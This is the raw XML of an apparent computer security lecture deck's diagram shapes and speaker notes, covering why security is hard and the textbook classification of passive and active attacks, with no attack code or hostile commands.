        <a:ln w="2642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312751" y="132733"/>
        <a:ext cx="827615" cy="447412"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{083DDE85-50BE-4C4A-87DF-5B54883598D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1582017" y="59406"/>
          <a:ext cx="855455" cy="475252"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="2642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1595937" y="73326"/>
        <a:ext cx="827615" cy="447412"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{80E67761-7713-4543-A98F-5DECABD5AB13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1189932" y="2019824"/>
          <a:ext cx="356439" cy="356439"/>
        </a:xfrm>
        <a:prstGeom prst="triangle">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="2642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F7A33A-7969-4EC1-8C88-9D93CE74DB7C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="240000">
          <a:off x="298506" y="1867086"/>
          <a:ext cx="2139290" cy="149593"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="2642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C7779E-00BD-42F8-B5FE-DA9D7409C6FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="240000">
          <a:off x="1569455" y="1265609"/>
          <a:ext cx="880575" cy="624459"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">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D</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1599939" y="1296093"/>
        <a:ext cx="819607" cy="563491"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A33A195F-8537-4D2A-8340-010E7CB586D1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="240000">
          <a:off x="1616980" y="619265"/>
          <a:ext cx="880575" cy="624459"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">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S</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1647464" y="649749"/>
        <a:ext cx="819607" cy="563491"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE4DA90B-3B93-4AE9-A1B7-B65B24172BC0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="240000">
          <a:off x="345679" y="1180064"/>
          <a:ext cx="880575" cy="624459"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">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L</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="376163" y="1210548"/>
        <a:ext cx="819607" cy="5634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5233B04-508A-4ED0-9E7B-F1538CFEEBF7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3277625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10244"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C20A34D6-EB4B-4C52-946F-3D46AC9FE52F}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2603649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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331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331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31D3E3F-168A-4D1C-ABDD-BDD42B211CE7}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77243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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3174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174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C2F754D-E5EE-4E0A-80B9-7D3C173FE49F}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="430331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F083B31-9E55-451F-8ACA-805311EDC336}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358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Ch0 ”Reader’s Guide” sets the scene for why we want to study these issues.</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307603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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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789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0645187-C172-486A-9EBD-4117D60EB409}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273518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Computer security is both fascinating and complex. Some of the reasons follow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Computer security is not as simple as it might first appear to the novice. The requirements seem to be straightforward, but the mechanisms used to meet those requirements can be quite complex and subtle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> In developing a particular security mechanism or algorithm, one must always consider potential attacks (often unexpected) on those security features. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Hence procedures used to provide particular services are often counterintuitive. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Having designed various security mechanisms, it is necessary to decide where to use them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security mechanisms typically involve more than a particular algorithm or protocol, but also require participants to have secret information, leading to issues of creation, distribution, and protection of that secret information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computer security is essentially a battle of wits between a perpetrator who tries to find holes and the designer or administrator who tries to close them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There is a natural tendency on the part of users and system managers to perceive little benefit from security investment until a security failure occurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security requires regular monitoring, difficult in today's short-term environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security is still too often an afterthought - incorporated after the design is complete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many users / security administrators view strong security as an impediment to efficient and user-friendly operation of an information system or use of information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs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7B40449-96DC-41DB-9D25-0B52C01D1E87}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345423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88E0F6B-D01D-4F45-A2B9-4A73CED0F5C8}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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useful means of classifying security attacks, used both in X.800 and RFC 2828, is in terms of </a:t>
            </a:r>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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>active attacks. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A passive attack attempts to learn or make use of information from the system but does not affect system resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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are in the nature of eavesdropping on, or monitoring of, transmissions. The goal of the opponent is to obtain information that is being transmitted. Two types of passive attacks are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ release of message contents - as shown above in Stallings Figure 1.2a here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+ traffic analysis - monitor traffic flow to determine location and identity of communicating hosts and could observe the frequency and length of messages being exchanged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>These attacks are difficult to detect because they do not involve any alteration of the data.</a:t>
            </a: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0979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8770EC-B544-40D6-8344-8242758FB42B}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Active attacks involve some modification of the data stream or the creation of a false stream and can be subdivided into four categories: masquerade, replay, modification of messages, and denial of service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> masquerade of one entity as some other</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> replay previous messages (as shown above in Stallings Figure 1.3b)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> modify/alter (part of) messages in transit to produce an unauthorized effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> denial of service - prevents or inhibits the normal use or management of communications facilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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121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A51D5-C3EA-4337-8412-E1C609DB047E}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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In considering the place of encryption, its useful to use the following two models from Stallings section 1.6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The first, illustrated in Figure 1.4, models information being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>transferred from one party to another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>over an insecure communications channel, in the presence of possible opponents.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The two parties, who are the principals in this transaction, must cooperate for the exchange to take place</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> They can use an appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>security transform (encryption algorithm)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, with suitable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, possibly negotiated using the presence of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trusted third party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parts One through Four of this book concentrates on the types of security mechanisms and services that fit into the model shown here.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1788212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BE3568C-EFD9-4ADE-8792-556A867CB71C}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>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altLang="it-IT">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140678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EA68D8B-3865-4EEB-AA24-85207C6C6839}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Consider the role of a security service, and what may be required. </a:t>
            </a:r>
          </a:p>
